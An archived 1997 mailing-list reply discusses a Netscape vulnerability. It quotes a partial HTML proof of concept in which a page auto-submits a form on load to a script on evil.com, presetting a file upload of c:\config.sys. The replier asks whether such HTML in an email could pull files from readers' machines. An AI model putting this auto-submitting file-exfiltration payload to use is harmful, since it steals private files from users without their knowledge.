[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Netscape Exploit

To: [email protected]
Subject: Re: Netscape Exploit
From: [email protected] (Anonymous)
Date: Wed, 2 Jul 1997 05:50:31 +0200 (MET DST)
Organization: Replay and Company UnLimited
Sender: [email protected]


> >Here is a sample it isn't complete but you get the basic idea of what is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> >	NAME="daForm"
> >	ACTION="http://evil.com/cgi-bin/formmail.pl"
> >	METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="[email protected]">
> >
> >and so on and so forth...

So if someone was using Netscape to read mail, and I included a small bit
of HTML like the above, I could snarf up files out of everywhere?

Prev by Date: Degaussing
Next by Date: Re: Internet - Good & Bad [CNN]
Prev by thread: Re: Degaussing
Next by thread: Re: Internet - Good & Bad [CNN]
Index(es):
- Date
- Thread